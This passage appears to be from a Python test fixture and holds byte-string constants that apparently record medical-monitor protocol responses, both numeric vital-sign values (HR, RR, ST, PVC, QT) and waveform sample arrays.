b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ 
b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_3_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x0f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ 
b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_3_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x0f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_3_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x7f\xf0\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x01\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xad\x20\x75\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x81\x21\xa1" \ b"\x09\x6e\x01\x06\x01\x01\x04\x00\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7" rsp_wave_3_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x7f\xf8\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ 
b"\x1f\xf3\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x06\x20\x08\x20\x0b\x20\x0e\x20\x10\x20\x13\x20\x17" \ b"\x20\x18\x20\x1a\x20\x1d\x20\x20\x20\x23\x20\x25\x20\x28\x20\x2b" \ b"\x20\x2e\x20\x31\x20\x33\x20\x30\x20\x30\x20\x2d\x20\x2a\x20\x28" \ b"\x20\x26\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x01\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x15\x20\x1d\x20\x23\x20\x29\x20\x31\x20\x37\x20\x3d" \ b"\x20\x45\x20\x4d\x20\x53\x20\x59\x20\x5f\x20\x67\x20\x6d\x20\x73" \ b"\x20\x79\x20\x7b\x20\x77\x20\x75\x20\x6d\x20\x67\x20\x61\x20\x59" \ b"\x20\x51\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ 
b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x08\x9e\x08\x66\x08\x30\x07\xfb\x07\xc9\x07\x99\x07\x6b" \ b"\x07\x40\x07\x18\x06\xf3\x06\xd2\x06\xb3\x06\x97\x06\x7f\x06\x69" \ b"\x06\x57\x06\x47\x06\x3a\x06\x2f\x06\x27\x06\x21\x06\x1d\x06\x1a" \ b"\x06\x19\x06\x19\x06\x1a\x06\x1b\x06\x1d\x06\x1e\x06\x20\x06\x20" \ b"\x06\x20" rsp_wave_3_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\x60\x00\x04\x00\x07\x03\x5a\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\x50\x00\x03\x00\x02\x0e\x80\x00\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x36\x00\x00\x00\x03" \ b"\x03\x30\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef\x1f\xed\x1f\xed\x1f\xec\x1f\xeb" \ b"\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3" \ b"\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb" \ b"\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4" \ b"\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3" \ b"\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde" \ b"\x1f\xdf\x1f\xe0\x1f\xe2\x1f\xe3\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8" \ b"\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2" \ b"\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc" \ 
b"\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x1f\xfc\x1f\xfa\x1f\xf9\x1f\xf9\x1f\xf9\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5" \ b"\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2" \ b"\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5" \ b"\x1f\xf6\x1f\xf5\x1f\xf5\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf9\x1f\xf8\x1f\xf9\x1f\xf9\x1f\xfa" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfc" \ b"\x1f\xfd\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfc" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xed\x1f\xed" \ b"\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe5" \ 
